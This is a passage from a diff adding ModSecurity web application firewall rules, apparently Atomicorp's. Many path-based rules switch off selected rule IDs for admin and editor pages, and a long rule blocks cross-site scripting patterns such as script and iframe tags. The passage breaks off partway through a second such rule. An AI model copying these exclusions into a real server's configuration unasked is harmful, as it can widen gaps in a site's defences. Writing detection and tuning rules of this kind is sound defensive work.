+SecRule REQUEST_FILENAME "/supportkb\.php" "phase:2,id:92439,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/template_update\.php" "phase:2,id:92440,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/editevents\.php" "phase:2,id:92441,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/edit_workshops\.php" "phase:2,id:92442,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/useredit\.php" "phase:2,id:92443,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admincp/staff/staff_edit\.php" "phase:2,id:92444,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113"
+
+SecRule REQUEST_FILENAME "/configproducts\.php" "phase:2,id:92445,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:92446,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=380026"
+
+SecRule REQUEST_FILENAME "/ajax/api/" "phase:2,id:92447,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ajax\.adm_server\.php" "phase:2,id:92448,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ftlocal\.html" "phase:2,id:92449,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/articles/editarticle\.php" "phase:2,id:92450,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/autosave-ajax\.php" "phase:2,id:92451,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cmsmodules/ecommerce/pages/tools" "phase:2,id:92452,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/products_frameset\.aspx" "phase:2,id:92453,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/contenu/contenu\.php" "phase:2,id:92454,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin_sklep/index\.php" "phase:2,id:92455,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/course/edit\.php" "phase:2,id:92456,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin\.php" "phase:2,id:92457,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/funcs\.php" "phase:2,id:92458,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ibd-admin/add_article\.php" "phase:2,id:92459,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/articles/editpicarticle\.php" "phase:2,id:92460,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/news/create" "phase:2,id:92461,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/products/add\.php" "phase:2,id:92462,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/products/edit\.php" "phase:2,id:92463,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/_editor/index\.php" "phase:2,id:92464,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380016"
+
+SecRule REQUEST_FILENAME "/stk/index\.php" "phase:2,id:92465,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/services/bmwidget\.json" "phase:2,id:92466,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/services/bmcontent\.json" "phase:2,id:92467,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/store_edit\.php" "phase:2,id:92468,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ajax\.process\.php" "phase:2,id:92469,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/sienna\.php" "phase:2,id:92470,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/sadmin/index\.php" "phase:2,id:92471,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/ajax_calls/updateletter\.php" "phase:2,id:92472,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cgi-bin/editfile\.cgi" "phase:2,id:92473,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=341048,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sendmail\.php" "phase:2,id:92474,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ajaxemail" "phase:2,id:92475,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin-db-create-table-census-load\.php" "phase:2,id:92476,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340157"
+
+SecRule REQUEST_FILENAME "/updateorder\.php" "phase:2,id:92477,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/awesome-gallery/resize\.php" "phase:2,id:92478,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/report\.php" "phase:2,id:92479,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/addvesti\.php" "phase:2,id:92480,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "email-templates\.php" "phase:2,id:92481,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cornerstone-endpoint" "phase:2,id:92482,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/fileman_file_edit\.php" "phase:2,id:92483,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/inc/e_product\.php" "phase:2,id:92484,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/configurator\.do" "phase:2,id:92485,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/supporttickets\.php" "phase:2,id:92486,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92487,t:none,pass,nolog,skipAfter:END_RULES_92487"
+
+SecRule ARGS|ARGS_NAMES|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:message|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:compressWhitespace,t:lowercase,capture,id:390147,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS_NAMES|!ARGS:message|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:/^dbem/!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/option_tree/|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/_head_/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:sotenson|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:/keycaptcha_code/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:analyticscode|!ARGS:top_news|!ARGS:tracking_code|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:whats-new|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/^field_/|!ARGS:match_report|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:/^instance/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS